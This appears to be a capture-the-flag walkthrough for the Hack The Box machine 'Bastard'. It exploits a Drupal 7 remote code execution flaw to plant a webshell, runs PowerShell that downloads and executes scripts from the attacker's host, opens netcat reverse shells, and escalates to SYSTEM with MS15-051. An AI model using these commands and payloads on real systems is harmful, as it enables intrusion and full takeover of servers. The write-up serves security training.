Machine Creator: ch4p
Remote Code Execution
Powershell Empire: Powerup.ps1
Task: To find User.txt and Root.txt
Let’s start with an NMAP scan.
nmap -sV -sC 10.10.10.9
Looking at the nmap results we can see this is a Microsoft IIS server 7.5 which is Server 2008 R2. We can also see that this is hosting a drupal 7 website.
HTTP – Drupal
If we open this web page in a browser we can see this is in fact a drupal instance.
For Drupal we can use a tool called droopescan. We can install using python pip installer.
Apt-get install python-pip
pip install droopsescan
Now we can run droopescan against the remote server. This will take a while to finish.
droopescan scan drupal -u http://10.10.10.9
The results from the scan are not too helpful we do get the exact version of drupal.
We know this is a drupal7 server lets use searchsploit to see if there are any vulnerabilities that we may be able to use.
Our search returned everything for drupal and we can see one that is called 7.x Remote Code Execution (RCE).
Lets copy the exploit to our working directory.
cp /usr/share/exploitdb/exploits/php/webapps/41564.php .
We need to manually edit this exploit which is written in PHP.
First install php-curl
apt-get install php-curl
Edit everything in yellow. Change the url and add the php code that will be executing.
After running our exploit we get an error. We need to troubleshoot this.
Let’s setup port forwarding. We will direct everything pointing to localhost:1337 to 10.10.10.9:80
Click on proxy then go to the options tab. Click on add and on the binding tab put in a random port.
Now setup the request handling.
On the request handling set the redirect to host 10.10.10.9 and redirect to port 80. Click OK.
We can test this now in the browser if we type in 127.0.0.1:1337 it takes us to the remote drupal page.
Now we need to update our exploit to route through the proxy.
We need to change the $url to the localhost with the port we specified.
We do want to make one change in the options tab under Intercept Client Requests. We want to make sure Intercept requests based on the following rules is checked and the File extension is unchecked.
If we run our code and check the HTTP history in Burp we can see 404 error page not found.
Lets send this post request to repeater. Right click on the post and send to repeater.
After some trial and error I found that if we edit the post to rest and click on go we get a 200 OK.
We need to edit our exploit change the URL back to 10.10.10.9 and set the endpoint_path to /rest.
If we run the exploit now get a successful file written on the remote server.
Now we can verify the upload by going to http://10.10.10.9/exploit.php and we see a blank page. There are no errors so we know the file exists.
Remote Code Execution
To run Remote Code Execution from our webshell we just need to add the function ?exec= and the command we want to run. In this example I ran dir to get the directory listings.
If we run our RCE with systeminfo we can see the OS Version and the Hotfixes. Google search will show that this machine is missing a service pack and has not been updated. Service pack 1 will show OS Version 6.1.7601.
We can find vulnerabilities using powerup from powershell empire.
Let’s download Powershell Empire.
git clone https://github.com/EmpireProject/Empire.git
Now that we have PSE downloaded lets copy the PowerUp.ps1 so we can edit it.
cp Empire/data/module_source/privesc/PowerUp.ps1 .
PowerUp.ps1 was made to run inside of empire so we need to add at the botom of the file “Invoke-AllChecks” and save.
Let’s start a simple python http server.
Now we need to pull the PowerUp.ps1 from our web server and execute on the remote machine.
In the webshell we can add this command.
http://10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.11:8000/PowerUp.ps1’) | powershell -noprofile –
We can see that powerup download from our python http server and executed.
After a couple of min we can see the results from the powerup.ps1.
Looking at the results we can see access denied which tells us that we don’t have admin rights.
Going through the results there is nothing that can help us elevate our permissions.
Let’s try finding a vulnerability using sherlock.ps1
Just like before we need to edit the end of the file this time with Find-AllVulns.
We can copy and execute sherlock the same way that we did powerup.
10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.11:8000/Sherlock.ps1’) | powershell -noprofile –
After running sherlock in our webshell we get a list of possible vulnerabilities.
Reverse Shell Netcat
Before we do our privledge elevation we need a remote shell we can do this with netcat x64 verison.
Unzip the netcat files so we can upload and run them.
Setup our netcat listener.
nc -lvnp 8081
Make sure the python simplehttp server is running
Python -m SimpleHTTPserver
Enter the follow url in the browser to upload netcat x64 and create a reverse shell.
http://10.10.10.9/exploit.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.11 8081
As you can see when we entered the code in the browser the remote server initiated get to our python http server to download the nc64.exe and after downloading there was a reverse shell created.
This netcat shell is running as low privledge.
If we look back at the sherlock powershell scan we did earlier we already know that this is a default install with no patching so it should be vulnerable to MS15-051.
From the github page we need to download the “MS15-051-KB3045171.zip” file and extract.
We need to extract the 64-bit version. MS15-051×64.exe
Similiar to the netcat upload we can upload this exploit and run it. In this example I’m doing a whoami and we can see that were running as system.
Similiar to the previous netcat we did were going to execute the existing nc file and create a 2nd reverse shell running as system.
nc -lvnp 8082
10.10.10.9/exploit.php?fupload=ms15-051×64.exe&fexec=ms15-051×64.exe “nc -e 10.10.14.11 8082”
After executing the new exploited netcat listener we now have a system level reverse shell.
User.txt and Root.txt
With our new system netcat shell we can read the contents of the user.txt
And we can view the contents of root.txt.txt.